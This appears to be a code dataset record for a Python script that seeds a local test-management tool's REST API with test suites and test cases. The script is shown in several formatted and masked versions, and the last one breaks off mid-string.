"Name": "Create and edit requirement" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Not selected project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Check if overview contains project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Edit project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Overview contains requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Edit requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Cover requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit TestSuites and TestCase" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case with details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create test set and run" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Edit test set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create test run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Execute contains tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Registration and log test" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Redirect to login page" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registration" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registrate same user" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Log and logout" }""" conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> # Basic script which send some request via rest api to the test-management-tool. # Be sure you setup host and api_token variable import http.client host = "localhost:8000" api_token = "fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3" # Connection conn = http.client.HTTPConnection(host) # Create a header of http request headers = { 'authorization': "Bearer " + api_token, 'content-type': "application/json", 'cache-control': "no-cache", 'postman-token': "44709a5c-ca4a-bbce-4b24-f0632a29bde4" } ################################################ payload = "{\n \"Name\": \"Create and edit project\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"Name\": \"Create and edit requirement\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Check if overview contains project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ ### payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Create test set and run\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Registration and log test\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login page\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers)
flexible
{ "blob_id": "0cc1aaa182fcf002ff2ae6cbcd6cbb84a08a3bc1", "index": 936, "step-1": "<mask token>\n", "step-2": "<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-3": "<mask token>\nhost = 'localhost:8000'\napi_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3'\nconn = http.client.HTTPConnection(host)\nheaders = {'authorization': 'Bearer ' + api_token, 'content-type':\n 'application/json', 'cache-control': 'no-cache', 'postman-token':\n '44709a5c-ca4a-bbce-4b24-f0632a29bde4'}\npayload = \"\"\"{\n \"Name\": \"Create and edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Check if overview contains project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create test set and run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Registration and log test\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login page\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-4": "import http.client\nhost = 'localhost:8000'\napi_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3'\nconn = http.client.HTTPConnection(host)\nheaders = {'authorization': 'Bearer ' + api_token, 'content-type':\n 'application/json', 'cache-control': 'no-cache', 'postman-token':\n '44709a5c-ca4a-bbce-4b24-f0632a29bde4'}\npayload = \"\"\"{\n \"Name\": \"Create and edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Check if overview contains project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create test set and run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Registration and log 